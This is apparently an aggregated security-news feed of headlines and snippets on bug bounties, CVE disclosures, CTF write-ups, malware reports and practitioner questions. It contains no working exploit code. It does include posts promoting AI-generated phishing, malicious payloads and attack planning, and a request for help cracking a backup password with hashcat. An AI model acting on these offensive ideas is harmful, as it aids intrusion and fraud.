    In the previous blog / video (https://medium.com/@lsecqt/using-discord-as-command-and-control-c2-with-python-and-nuitka-8fdced161fdd /… Continue reading on Medium »
    Mr. Robot THM(linux machine ctf)
    Nmap scan : Continue reading on Medium »
    40 Tips and Tricks to Improve your Bug Bounties as a beginner
    TL;DR — Some great bug hunting tips I’ve accumulated from various sources for beginners looking to gain an edge as soon as possible. Continue reading on The Gray Area »
  • Open

    OWASP Top 10 CI/CD Security Risks project released
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]
    GitHub Actions - Artifact Poisoning Vulnerability
    submitted by /u/dotanoam [link] [comments]
  • Open

    Cloud Penetration Testing prerequisites
    Hi, when conducting a cloud penetration test (let's say a public cloud like Azure) do you require from the client a guest/user account of the tenant that you are testing? What are the requirements or prerequisites that the client needs to fulfill before the cloud penetration test begins? ​ submitted by /u/5u13 [link] [comments]
    Correct way to Disable PHP Execution
    Found this code from a reddit post 2 years ago: Order Deny,Allow Deny from All But malcare .com article has a bit different code: Order Allow,Deny Deny from all Which is the correct code to do? Want to do this so no can upload anything even if they inside. submitted by /u/yoyobono [link] [comments]
    Python experience, how do I get into cybersecurity?
    Hi everyone, I have good Python experience (not professionally - still a beginner also - self-taught), but I'm comfortable with the language. I've developed simple social media tools, tinkered around with JS and different web frameworks, even sold some code to amateur online marketeers (my main source of income). My queston is, at the moment, I'm a new linux user and still getting comfortable with the OS. I'm interested in cybersecurity and would like to see how my coding skills might benefit me/give me an advantage down the way. Where do I start? I appreciate you're probably seeing this question on daily basis. PS: basic networking knowledge. submitted by /u/Relevant-Document570 [link] [comments]
  • Open

    SecWiki News 2022-12-04 Review
    GadgetInspector改造中反序列化三个source点的原理分析 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-04 Review
    GadgetInspector改造中反序列化三个source点的原理分析 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    Noob here, tried adding via hash sets, but failed. Any idea on how to add in SHA1 values in the Metadata for Autopsy while viewing a outlook.pst file? I'm able to view the MD5 & SHA256 hash values of the file, however I'm unable to view the SHA1 value. Any advise would be greatly appreciated
    submitted by /u/LMJR500Army [link] [comments]
    Need help decrypting my itunes backup key
    Hello, long story short I made a backup and forgot its password I think it was about 5-6 characters without symbols, I searched for a while and found that some people had luck with using hashcat`s -m14800, but I need help using it. my laptop`s card isn`t compatible with hashcat for some reason 1660ti, so its very slow. I want to know if I can send the hash file to someone to try or how to get hashcat to detect my card drivers and use a dictionary and limit the password length ​ submitted by /u/codeXII [link] [comments]
  • Open

    如何使用scrcpy管理和控制你的Android设备
    scrcpy是一款针对Android设备的管理和控制工具,该工具可以通过USB或TCP/IP来帮助广大研究人员显示、管理和控制Android设备。
    SCMKit:一款功能强大的针对源代码管理系统的安全测试套件
    SCMKit,全称为Source Code Management Attack Toolkit,是一个可以用于对SCM源代码管理系统进行渗透测试的强大工具包。
    FreeBuf早报 | 俄罗斯政府遭勒索软件攻击;美国发布“星盾”卫星项目
    美国太空探索技术公司正式在其官网主页发布了专门为政府服务的 “星盾”卫星项目。“星盾”卫星将利用“星链”卫星的技术和发射能力,为国家安全工作提供支持和保障。
    Octopii:一款AI驱动的个人身份信息(PII)扫描工具
    Octopii是一款功能强大的AI驱动的个人身份信息(PII)扫描工具,可以帮助广大研究人员在一个目录中扫描各种和个人身份信息(PII)相关的图片资源。
  • Open

    BOF Exploit fails outside GDB
    i just started studying exploit development, currently doing exploits for linux x84 (running on 32 bit kali linux).but my exploit is not working outside GDB, running exploit payload inside gdb is giving me shell on machine but without GDB iam getting error, tried googling for this issue but didnt help. any idea why is this happening NB: iam absolute starter on exploit dev submitted by /u/Salt_Annual [link] [comments]
    Black Hat 2022 USA/ASIA/Europe
    The videos of the BLACK HAT 2022 conference have been published on YouTube. USA https://www.youtube.com/playlist?list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq ASIA : https://www.youtube.com/playlist?list=PLH15HpR5qRsW2vrD-6pHklASq8T_CPZBv EUROPE : https://www.youtube.com/playlist?list=PLH15HpR5qRsVY4gZPQrkdVBeR_BwNujGe submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Black Hat 2022 USA/ASIA/Europe
    The videos of the BLACK HAT 2022 conference have been published on YouTube. USA https://www.youtube.com/playlist?list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq ASIA : https://www.youtube.com/playlist?list=PLH15HpR5qRsW2vrD-6pHklASq8T_CPZBv EUROPE : https://www.youtube.com/playlist?list=PLH15HpR5qRsVY4gZPQrkdVBeR_BwNujGe submitted by /u/soupcreamychicken [link] [comments]
  • Open

    The Consequences of Hacking Netflix
    It was a dark and stormy night, and John was feeling restless. He had been trying to find something good to watch on Netflix, but nothing… Continue reading on Medium »
    URL Validation Bypass Using Browser URI Normalization
    Hello everyone, I am Marx Chryz and I do bug bounty hunting for about two years now. It’s also been three and a half years since I started… Continue reading on Medium »
    The most underrated injection of all time — CYPHER INJECTION.
    Yo! Continue reading on Medium »
    Top Vulnerability Management Tools You Need to Know!
    What Exactly is Vulnerability Management? Continue reading on Bug Zero »
    ACM CTF-Walkthrough
    Recently I have participated in a FUN cyber challenge competition “ACM Cyber challenge”. All the challenges(beginner friendly with graded… Continue reading on Medium »
    An Actually Useful Rant About an Obnoxious Medium Bug
    Since I do not know if the bug report I filed will have any effect Continue reading on Geeky Pub »
    Mango Markets is Prepared to Award a $47 Mn Bug Reward to a Hacker
    Mango Market: What is that? Continue reading on Bug Zero »
    Zoom’s Bug Bounty Programs Have Reached $1.8 Mn
    Zoom’s private bug bounty program has paid out $2.4 million in cash and merchandise to security researchers. Continue reading on Bug Zero »
    40 Tips and Tricks to Improve your Bug Bounties as a beginner
    TL;DR — Some great bug hunting tips I’ve accumulated from various sources for beginners looking to gain an edge as soon as possible. Continue reading on The Gray Area »
    How and why you should collaborate in bug bounty
    In this write-up, I will discuss collaboration in bug bounty programs. I have received many questions about this topic, so I thought it… Continue reading on Medium »

  • Open

    In and out of Bug bounty in 6 months, Made Over $12K
    You read the title. I won’t make any more introductions and bore you for no reason. What happened? How did I do it? With no knowledge at… Continue reading on Medium »
    Follow these 6 bug report enhancements and see the change!
    Improve engineer‘s productivity with 6 simple steps. Continue reading on Medium »
    3 Step IDOR in HackerResume
    Before moving forward with this blog if you don’t have any context over what IDOR is you can refer the same over here Continue reading on Medium »
    A $$$ worth of cookies! | Reflected DOM-Based XSS | Bug Bounty POC
    Hey everyone! This is Haroon Hameed and I’m here to share about my recent finding on Synack Red Team about Reflected DOM-based XSS. Continue reading on Medium »
    Bug Zero at a Glance [Week 26 November — 2 December]
    What Happened with Bug Zero? Continue reading on Bug Zero »
    Account Takeover - Inside The Tenant
    Summary : Continue reading on Medium »
    Automating Recon: The Tools and Techniques Used by Today’s Hackers
    Introduction Continue reading on Medium »
    A young computer whiz
    Meet Jack, a young computer whiz who has been fascinated by the world of hacking since he was a teenager. Growing up in the digital age… Continue reading on Medium »
    Websites That Help You Improve Your Ethical Hacking Skills
    A Defenitive List Continue reading on Bug Zero »
  • Open

    3 International Texts Sent from Phone on its Own
    So I just got my phone bill and I have 3 SMS texts to an international number I don’t identify listed in the bill. I tried searching in my messages app for the texts and didn’t find any. Does anyone have an idea what this could be? I’m using an iPhone 13 on latest iOS btw. submitted by /u/iclorz [link] [comments]
    What scanners are you using that you'd recommend to an AppSec team for auditing?
    We have desktop, web and mobile products at my company. Currently we grey box audit our products using standard commercial tooling like Burp Pro and open source told semgrep, ODC and Nmap to find low hanging fruit then we have a whole team that deep dives for weeks. I think that this is usual for kids of teams. I'm wondering how we can enhance that initial low hanging fruit hunt stage. After hearing the term "next gen scanner" used recently I was wondering what commercial tools this sub might recommend as things must have moved on since the last time I looked at scanners and they were all no better than a well configured Burp. I'm thinking of tools like Snyk, but not Snyk as maintaining it was historically a pain. submitted by /u/jeffreyshran [link] [comments]
    Is this a hacking script? -- Strange file reappears in INetCache\IE\ folder (noob)
    Hello, Using CCleaner I noticed some files named 2[1] and 2[2] being created in \AppData\Local\Microsoft\Windows\INetCache\IE\032AEAD3, of filetype "file" (I have Hide extensions unchecked in options but there is none displayed). This might just be Microsoft Diagnostics, or a virus hijacking the processes for keylogging. I am pursuing a college-level programming degree so I know a tiny bit more than nothing but this could be anything. ​ Windows 10 Home Bitdefender Antivirus Free Malwarebytes Free O&O Shutup (Tinywall firewall) I will post the entire script and add my own comments in ALLCAPS and add breaks to help with reading, thank you for your time: 'use strict'; class TimeSpan { constructor(ticks) { this.value = ticks; } ticks() { return this.value; } milliseconds() { retu…
    Is there a difference in the level of security of average networked cameras and those provided by security companies?
    Got to thinking about this after the recent Eufy discoveries (only local storage isn't only local, not encrypted). With IoT it isn't a surprise that these cameras have low security, but does anyone know if it's all the same crap with cameras being sold as part of home alarm packages from security companies? submitted by /u/3859160912653957 [link] [comments]
  • Open

    Advent of Cyber 2022 [Day3] — OSINT Nothing escapes detective McRed — Writeup
    OSINT Nothing escapes detective McRed Writeup ~December 3, Karthikeyan Nagaraj Continue reading on System Weakness »
    Working with data leaks…
    It often happens that a long-forgotten old is recognized as new. This year, a similar thing happened with the domestic software product… Continue reading on Medium »
    Let’s talk about the exploration of cryptocurrencies…
    The year began under the star “Crystal” https://explorer.crystalblockchain.com/ a free and public (at that time) Bitcoin explorer that… Continue reading on Medium »
  • Open

    AI scripts ways to abuse PowerShell Functions
    We have seen AI write scripts and whatnot, but what if you tell it not to use a specific function? I did a quick video showcasing how AI can adapt to abusing some Powershell functions. I also asked it questions regarding ethical concerns. https://youtu.be/2xdqXiIEkvU Looking to gather everyone's thoughts on future use cases on this, where do you see the role of AI for the Red Team? It can create more sophisticated attack strategies, automate the gathering and analyzing of data, and even identify weaknesses in existing networks and systems. AI can also be used to develop more effective social engineering techniques, such as generating convincing phishing emails, and can even be used to automate generating malicious payloads. Further, AI can automate identifying new target systems, exploiting them, and creating more effective post-exploitation strategies. submitted by /u/Techryptic [link] [comments]
  • Open

    Trying to download multiple large folders from fsck.technology - help?
    submitted by /u/iissmarter [link] [comments]
  • Open

    Using AI to write Malware?! (Ethical reasoning and future use cases)
    submitted by /u/Techryptic [link] [comments]
  • Open

    SecWiki News 2022-12-03 Review
    Web漏洞挖掘基础系列 by ourren [HTB] Secret Writeup by 0x584a THREAT-crawl: Automated Method and Tool to Crawl Criminal Underground Forums by 路人甲 国内外网络靶场发展状态演进与分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-03 Review
    Web漏洞挖掘基础系列 by ourren [HTB] Secret Writeup by 0x584a THREAT-crawl: Automated Method and Tool to Crawl Criminal Underground Forums by 路人甲 国内外网络靶场发展状态演进与分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    [KIS-2022-06] Drupal H5P Module <= 2.0.0 (isValidPackage) Zip Slip Vulnerability
    submitted by /u/eg1x [link] [comments]
    Pre-Auth RCE with CodeQL in Under 20 Minutes
    submitted by /u/Gallus [link] [comments]
    kitabisa/teler release v2.0.0-dev
    submitted by /u/dwisiswant0 [link] [comments]
  • Open

    The Windows Process Journey — csrss.exe (Client Server Runtime Subsystem)
    The goal of “csrss.exe” (Client Server Runtime Subsystem) is to be the user-mode part of the Win32 subsystem (which is responsible for providing the Windows API). “csrss.exe” is included in Windows from Windows NT 3.1. It is located at “%windir%\System32\csrss.exe” (which is most of the time C:\Windows\System32\csrss.exe). From Windows NT 4.0 most of the Win32 subsystem has been moved to kernel mode — “With this new release, the Window Manager, GDI, and related graphics device drivers have been moved to the Windows NT Executive running in kernel mode” (https://learn.microsoft.com/en-us/previous-versions//cc750820(v=technet.10)?redirectedfrom=MSDN#XSLTsection124121120120?redirectedfrom=MSDN#XSLTsection124121120120)). Thus “csrss.exe” manages today GUI shutdowns and windows console (today i…
    kitabisa/teler release v2.0.0-dev
    submitted by /u/dwisiswant0 [link] [comments]
    Very large RAID acquisition sand FTK imager
    Has anybody tried to image a large amount of data 10TB or more with FTK imager? I brought about 25tb to my scene in the form of several 1-4tb hdds. I thought I would be using my hardware imagers but turns out customer’s RAID is what I need to acquire. (Last second incident response…) The RAID shows up in FTK imager as one drive 10-15tb in size. I want to know if I can use FTK imager to start acquiring without it breaking the imaging operation as I switch out disks. Anybody ever encounter this or had success or failure? submitted by /u/Muhlgasm [link] [comments]
  • Open

    CVE-2022-35260: .netrc parser out-of-bounds access
    Internet Bug Bounty disclosed a bug submitted by kurohiro: https://hackerone.com/reports/1753224 - Bounty: $480

  • Open

    Do you know anyone, if anyone, that has non-computer related felonies on their record in the field?
    I was wondering what the reality of the situation is - reason I chose red teaming was because bug bounties and there being no barrier to entry there. Blue teaming stuff you pretty much need someone’s permission to access their environment in order to do your job. I messed up as a young guy, and have been spending the past couple years trying to right my wrongs with society, myself and my family; but it’s been tough to find someone to take a shot. I do currently help with boot camps and getting students where they need to be, but I myself haven’t been able to land a role while a lot of people who’ve gone through our programs have. Currently going through the OSCP to try and cement my technical ability on paper in hopes it might overshadow that + doing a bachelors at WGU as well. Any tips for a young professional trying to keep this dream alive? submitted by /u/Swoozyed [link] [comments]
    What do you think about this image?
    ​ https://preview.redd.it/rs73y8gjej3a1.jpg?width=479&format=pjpg&auto=webp&s=96f9e6955302c1b4c5562daa7a03b8f4dbcf9d02 submitted by /u/pacman0026 [link] [comments]
  • Open

    Regenerate session ID after password change?
    So I understand the purpose of regenerating a session ID after a state change such as authenticating, i.e. to prevent session fixation. What I'm not clear on is why this would be necessary after a password change (as recommended by OWASP). If an attacker has hijacked the victim's session cookie, yes, invalidating that sessionID would kick the attacker off, but why should that be done specifically at the time of a password change? Is it because there is an assumption that if a user is changing their password, that they may suspect their account has been compromised? Otherwise, a password change seems like an arbitrary time to regenerate the sessionID. In the case of an attacker who has stolen the victim's password: the attacker will have his own session. Regenerating the sessionID after password change would not affect the attacker's session, would it? (On that note -- is the current best practice to invalidate ALL sessions after a password change? I seem to be getting varying answers on this.) ​ TIA submitted by /u/m8trix09 [link] [comments]
    What is the general security agreement on using Samsung Pass or Apple iCloud keychain?
    Hello, What is your opinion / do you know a good review about the general security of Samsung Pass or Apple iCloud keychain? I am interested in that their implemented solution to access stored password in their own app (Samsung Pass: fingerping) and the general password security / storing is considered secure. In other way: do they have more secure password protection than using a general password manager, like 1password or Bitwarden? Should I be more concerned my password when a hacker attacks Samsung Pass / iCloud keychain then using 1password or Bitwarden? ​ Thank you! submitted by /u/question_house [link] [comments]
    Industry Standard 401K policy?
    I met my 401K max very early this year. I am being told that my company will no longer contribute the company match since I am no longer contributing. I am being told this is "industry standard". I think it's split, but previous companies I've worked for continued to pay the company match after the employee limit was met. Does anyone know if your company will continue to pay the company match if the personal 401K limit has been reached? submitted by /u/throwaway401kquestn [link] [comments]
    What is a pen testers day to day like?
    Hi. I would like to get into pen testing after college, and I would like to know what its like in the day of a pen tester? submitted by /u/AlternativeNo5023 [link] [comments]
    Why does universal device-to-device encryption not exist on a MAC/IP level?
    Every device on the internet has a MAC address and an IP address. Every device on the internet makes connections to other devices with MAC addresses and IP addresses. The majority of those devices generally expects that connection to be secure and private. Why does every device not generate a private/public encryption key alongside their MAC address and then performs ECDH (I think is the latest and greatest, right?) every time it connects to a new router, etc.? Why does every device not generate a private/public encryption key alongside their IP address, and simply end-to-end secure (literally on a device-to-device level) every connection? Obviously it would be nice to opt out of this for something like gaming, but why is everything just left arbitrarily (and usually either messy, inefficient, or insecure) up to each individual app/server/connection? submitted by /u/Tough-Win-9367 [link] [comments]
    Malware Targeting Industrial Networks Published Openly on Github with Source Code for Researchers
    VX-Underground recently released a new malware strain targeting ICS systems which was later revealed by RoseSecurity (https://github.com/RoseSecurity/SIMATIC-SMACKDOWN). The initial disclosure was made on (https://twitter.com/vxunderground/status/1597953674353205249). Think this could get researchers onboard with locking down these networks? [link] [comments]
    Network Security Engineer Day to Day tasks
    Hi, I'm interested in NetSec roles; job descriptions feel pretty vague and I feel unprepared for the role. What are the daily tasks of NetSec ( FW concentrated roles ) You can rely on internal/vendor documentation / Google you don't need to know to configure/TShoot every feature from the top of your head right? submitted by /u/Odd-Jump-3066 [link] [comments]
    Spear Phishing emails escalate to spear phishing text message
    My work uses a terrible CMS that does not properly hide the email addresses listed on our website. Our executives insist on having all of our email addresses published on our site. Complete cluserfuck! Since the day I started, everyone at the company receives frequent spear phishing emails. The emails always pretend to come from the CEO. If you reply they will eventually ask you to purchase gift cards. As soon as I started with the company we enabled email protection and stopped the attackers from being able to spoof our CEO's email address. Now they just open random gmail addresses like [cucksucker3000@gmail.com](mailto:cucksucker3000@gmail.com) and pretend to be our CEO to other employees, these get flagged by our spam filter, and email system policies DMARK/DKIM/SPF, etc. We train our users on cyber security, to spot phishing emails if they get through. Because of all this I don't think these attacks have been very fruitful to the attackers. Recently they've moved on to something new. They are now texting some of our employees from random out of state phone numbers pretending to be the CEO. THIS IS NEW TO US. Our personal cellphone numbers are not published on our website. Does this mean they are looking up our employee's cell phone numbers? Cross-referencing them with the data that they scraped off of our website? Has anyone else experience this recently where spear phishing emails escalate to spear phishing SMS messages. It really seems like it's from the same attackers. ​ TIA submitted by /u/bluntasfuck [link] [comments]
    Tools for leaked email/password in previous breaches/dark web
    Is there any simple tool/open source tool that can tell if any employee's corporate email account/password was leaked in breaches or in the dark web? submitted by /u/Calm_Scene [link] [comments]
    Cybersecurity for developers
    What are the roles in cybersecurity that an AppDev or WebDev can pursuing ? submitted by /u/NewbieInTech00 [link] [comments]
  • Open

    Exposed Cortex API at https://cortex-ingest.shopifycloud.com/
    Shopify disclosed a bug submitted by ian: https://hackerone.com/reports/1258871 - Bounty: $6300
    POST following PUT confusion
    Internet Bug Bounty disclosed a bug submitted by robbotic: https://hackerone.com/reports/1752146 - Bounty: $2400
    XSS in Acronis Cloud Manager Admin Portal
    Acronis disclosed a bug submitted by mooimacow: https://hackerone.com/reports/1388788 - Bounty: $100
    Authentication bypass in https://nin.mtn.ng
    MTN Group disclosed a bug submitted by roland_hack: https://hackerone.com/reports/1747146
  • Open

    Best way to go through a samsung backup?
    I have an external backup that was saved through smart switch backup onto pc from a samsung phone. What is the best way to go through the data? submitted by /u/JackedTORtoise [link] [comments]
    memory dump with FTK Imager
    I created a memory dump with FTK Imager. I only see in the evidence tree " memcapture.ad1" and memory Dump [AD]1. And i only see in the file list 2 files: memdump.mem and pagefile.sys. Is this normal? What can i do with these files? submitted by /u/Least_Lab375 [link] [comments]
  • Open

    TryHackMe | Red Team Fundamentals WriteUp
    This room is an introduction to red teaming. Continue reading on Medium »
    Using Discord as Command and Control (C2) with Python and Nuitka
    Hello fellow red teamers, I was thinking of a way to obfuscate C2 traffic and got myself an idea. Why not chain the traffic over some… Continue reading on Medium »
    Взлом автомобилей Hyundai и Genesis
    Недавно мы обнаружили уязвимость, затрагивающую автомобили Hyundai и Genesis, с помощью которой можно удаленно управлять замками… Continue reading on Medium »
    Ещё больше про взлом автомобилей
    Ранее в этом году мы смогли удаленно разблокировать, завести, определить местонахождение, мигать и сигналить любым удаленно подключенным… Continue reading on Medium »
  • Open

    [WRITE-UP] Irremovable comments on the FB Lite app | A story of a simple FB Lite bug that I found…
    Hi guys, I’m Shubham Bhamare again. In this write-up, I’m going to tell you how I found a simple FB Lite bug that restricted FB Lite app… Continue reading on Medium »
    Hello Everyone!
    We’ll be learning about building computers, creating tools, automating the recurring process to save time and let us focus on the… Continue reading on Medium »
    webdriver_prefs.json — File Not Found Error Solved in Linux | Eyewitness | Kali Linux
    FileNotFoundError: No such file or directory: /webdriver/firefox/webdriver_prefs.json — Error Solved | November 2022 | Karthikeyan Nagaraj Continue reading on System Weakness »
    What is Bug Bounty?
    And how you can make Continue reading on Medium »
    Взлом автомобилей Hyundai и Genesis
    Недавно мы обнаружили уязвимость, затрагивающую автомобили Hyundai и Genesis, с помощью которой можно удаленно управлять замками… Continue reading on Medium »
    Ещё больше про взлом автомобилей
    Ранее в этом году мы смогли удаленно разблокировать, завести, определить местонахождение, мигать и сигналить любым удаленно подключенным… Continue reading on Medium »
    Interesting find on the Invite link
    Find a vulnerability in an Invite link Continue reading on Medium »
    Sql injection
    This is for information only, and this scenario has been encountered more than once, but it must be noted Continue reading on Medium »
  • Open

    Fuzzing Ping(8)
    Article URL: https://tlakh.xyz/fuzzing-ping.html Comments URL: https://news.ycombinator.com/item?id=33833715 Points: 10 # Comments: 0
    Fuzzing Weekly CW 48: Introducing Afl-Ruby: Fuzz your Ruby programs using afl
    Article URL: https://ioc.exchange/@FuzzingWeekly/109444121411765283 Comments URL: https://news.ycombinator.com/item?id=33829741 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-12-02 Review
    细谈CS分离式shellcode的加载之旅 by ourren 企业级钓鱼演练平台搭建 by 路人甲 POLYGLOT:使用语义验证的通用语言处理器模糊测试引擎 by ourren Tenda Ax12 设备分析 by 路人甲 隐私计算线上慕课 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-02 Review
    细谈CS分离式shellcode的加载之旅 by ourren 企业级钓鱼演练平台搭建 by 路人甲 POLYGLOT:使用语义验证的通用语言处理器模糊测试引擎 by ourren Tenda Ax12 设备分析 by 路人甲 隐私计算线上慕课 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    🤯 Mind-Blowing examples of OpenAI ChatGPT for Security, Infosec & Hacking
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Blowing Cobalt Strike Out of the Water With Memory Analysis
    Unit 42 researchers examine several malware samples that incorporate Cobalt Strike components, and discuss some of the ways that we catch these samples by analyzing artifacts from the deltas in process memory at key points of execution. We will also discuss the evasion tactics used by these threats, and other issues that make their analysis problematic. The post Blowing Cobalt Strike Out of the Water With Memory Analysis appeared first on Unit 42.
  • Open

    #FuzzingWeekly CW 48
    Looking for Remote Code Execution bugs in the Linux kernel: https://xairy.io/articles/syzkaller-external-network Continue reading on Medium »
  • Open

    #FuzzingWeekly CW 48
    Looking for Remote Code Execution bugs in the Linux kernel: https://xairy.io/articles/syzkaller-external-network Continue reading on Medium »
  • Open

    Redigo — New Redis Backdoor Malware
    submitted by /u/gfdgfbal [link] [comments]
    Certpotato : using adcs to privesc from service accounts to local system
    submitted by /u/qwerty0x41 [link] [comments]
    VLC : Integer overflow in vnc module - CVE-2022-41325
    submitted by /u/jeandrew [link] [comments]
    XSS on account.leagueoflegends.com via easyXDM [2016]
    submitted by /u/bored-engineer [link] [comments]
    Visual Studio Code: Remote Code Execution
    submitted by /u/Zemnmez [link] [comments]
  • Open

    MAC钓鱼并Root权限上线CS并权限维持,以及所有的坑如何解决
    MAC钓鱼并Root权限上线CS并权限维持,以及所有的坑如何解决分享学习。
    全国首例!云南破获域名黑产大案,抓获630人
    在公安部的组织指挥下,云南公安机关历时8个多月,成功破获全国首例域名黑产犯罪案件。
    FreeBuf周报 | Facebook因数据泄露被罚2.65亿欧元;LastPass承认客户数据被窃
    周报时间到!我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    十年未被发现!现代汽车曝重大安全漏洞,黑客可远程解锁、启动汽车
    这个漏洞已经存在了10年之久,影响了自2012年生产的现代汽车,以及旗下高端品牌捷尼赛思汽车。
    速看!Redis服务器被植入后门
    恶意软件的名称Redigo是由它的目标机器和构建它的编程语言命名的。
    医保基金公司Medibank数据大规模泄露后,澳紧急将罚款提高至5000万
    黑客再次在暗网公布Medibank用户敏感数据,这已经是黑客连续数次公布盗窃数据。
    30 万安卓用户 Facebook 凭证遭“Schoolyard Bully”木马窃取
    “Schoolyard Bully”木马程序伪装成合法的教育主题应用程序,引诱毫无戒心的用户下载,之窃取Facebook的凭证。
  • Open

    Route Analysis (Information Gathering)
    A Routing Analysis is a type of network analysis that determines the optimal path or route, from one network location to another or… Continue reading on System Weakness »
  • Open

    3 Free Videos to Turbocharge Your Infosec Journey
    No content preview
  • Open

    3 Free Videos to Turbocharge Your Infosec Journey
    No content preview
  • Open

    3 Free Videos to Turbocharge Your Infosec Journey
    No content preview
  • Open

    CVE-2022-29464 WSO2 API Manager 任意文件上传、远程代码执行漏洞
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/K9nmiwr8yL5tVxiLnhFDmA 漏洞描述 某些WSO2产品允许不受限制地上传文件,从而执行远程代码。以WSO2 API Manager 为例,它是一个完全开源的 API 管理平台。它支持API设计,API发布,生命周期管理,应用程序开发,API安全性,速率限制,查看AP...
  • Open

    CVE-2022-29464 WSO2 API Manager 任意文件上传、远程代码执行漏洞
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/K9nmiwr8yL5tVxiLnhFDmA 漏洞描述 某些WSO2产品允许不受限制地上传文件,从而执行远程代码。以WSO2 API Manager 为例,它是一个完全开源的 API 管理平台。它支持API设计,API发布,生命周期管理,应用程序开发,API安全性,速率限制,查看AP...
  • Open

    Random Christmas TV episodes from UK and US
    submitted by /u/GeniusOfLove74 [link] [comments]

  • Open

    Platform certificates used to sign Android malware
    submitted by /u/ScottContini [link] [comments]
    UART Essential for Pentester
    submitted by /u/Void_Sec [link] [comments]
    Windows Exploitation Challenge - Blue Frost Security 2022 - VoidSec
    submitted by /u/Void_Sec [link] [comments]
    Huawei Security Hypervisor Vulnerability
    submitted by /u/jeandrew [link] [comments]
    How we found a supply-chain vulnerability in IBM Cloud Databases for PostgreSQL
    submitted by /u/sagitz_ [link] [comments]
    The CI/CD Goat just got wilder! - A new challenge to the deliberately vulnerable CI/CD environment
    submitted by /u/TupleType [link] [comments]
    Unauthenticated Command Injection in Asus M25 NAS
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
    Bypassing Web Application Firewalls
    submitted by /u/ma-ni [link] [comments]
    Remote code execution bug in FreeBSD's ping (CVE-2022-23093)
    submitted by /u/Gallus [link] [comments]
    Notice of Recent Security Incident - The LastPass Blog
    submitted by /u/svmseric [link] [comments]
    Race condition in snap-confine's must_mkdir_and_open_with_perms() (CVE-2022-3328) - SUID-root program installed by default on Ubuntu
    submitted by /u/Gallus [link] [comments]
    Black Hat USA 2022 Conference Recordings
    submitted by /u/sanitybit [link] [comments]
    RFC 8628 lets you phish people even if they're using WebAuthn
    submitted by /u/sanitybit [link] [comments]
  • Open

    Stored XSS in /admin/product and /admin/collections
    Shopify disclosed a bug submitted by ashketchum: https://hackerone.com/reports/1147433 - Bounty: $5300
    Disconnecting an external login provider does not revoke session
    Shopify disclosed a bug submitted by attackerbhai: https://hackerone.com/reports/1547684 - Bounty: $1600
    Read/Write arbitrary (non-HttpOnly) cookies on checkout pages via GoogleAnalyticsAdditionalScripts postMessage handler
    Shopify disclosed a bug submitted by bored-engineer: https://hackerone.com/reports/1081167 - Bounty: $1600
    Subdomain Takeover at course.oberlo.com
    Shopify disclosed a bug submitted by m7mdharoun: https://hackerone.com/reports/1690951
    Remove Every User, Admin, And Owner Out Of Their Teams on developers.mtn.com via IDOR + Information Disclosure
    MTN Group disclosed a bug submitted by wallotry: https://hackerone.com/reports/1448550
    Unprotected Direct Object Reference
    MTN Group disclosed a bug submitted by coyemerald: https://hackerone.com/reports/1536936
    Firebase Database Takeover in https://pulseradio.mtn.co.ug/
    MTN Group disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1447751
    Calendar name length not validated before writing to database
    Nextcloud disclosed a bug submitted by errorx404: https://hackerone.com/reports/1596148
    CVE-2022-45402: Apache Airflow: Open redirect during login
    Internet Bug Bounty disclosed a bug submitted by bugra: https://hackerone.com/reports/1782514 - Bounty: $2400
    Double evaluation in .bash_prompt of dotfiles allows a malicious repository to execute arbitrary commands
    Ian Dunn disclosed a bug submitted by ryotak: https://hackerone.com/reports/1785378 - Bounty: $300
  • Open

    Applying for a job and they need to see my NDA contract and need to fill out a form regarding my government agency work — is this normal?
    I’m applying for jobs after graduation and a job I’m really interested in requested to see my NDA contract. In fact, it’s contingent on this. And I need to fill out a form regarding my government agency work — is this normal? submitted by /u/hungry_squared_hippo [link] [comments]
    Is my theory that many small businesses could do without Windows & AD reasonable?
    I made a LinkedIn post that was well received by my 99% cybersec connection pool, but LI isn’t the place for critical feedback and that’s what I’m looking for here. I’ll link the post but can summarize it easily: I propose an extreme version of attack surface reduction for small businesses who mostly use apps that exist in a web browser (Quickbooks, Microsoft Office, Google Docs, Dropbox, etc) by replacing Active Directory + Windows (and all the potential for mistakes + cost to avoid them) with Chrome OS Flex (which updates itself), where their local network is treated like untrusted Café Wi-Fi. Some local security / tech leaders reached out with interests in facilitating some sort of pilot test. I’ve been tinkering with the OS and thinking through what friction / problems we might run into. Not for everyone: Some companies will have apps they can’t replace with websites. If that’s too prevalent throughout the business, it’s a no-go. Plan to possibly test it slowly with a fraction of a business’s employees at first and just see how it goes. Any thoughts / concerns? submitted by /u/Jonathan-Todd [link] [comments]
    Soc Analyst
    I'm 22 years old and I don't have any degree, in 2/3 years I'll get my computer high school diploma. Is self-taught study enough to get a job as a soc analyst in europe ?(in Europe CompTIA certifications are few valuable) Actually I'm learning C programming, architecture of computer and Linux. submitted by /u/NewbieInTech00 [link] [comments]
    Is there an interactive trainer for Network Security like hackthebox?
    CyberSecurity has hackthebox, is there something similar for offensive Layer 2, 3 security? submitted by /u/Last-Literature206 [link] [comments]
    Strange certificates: State = Denial
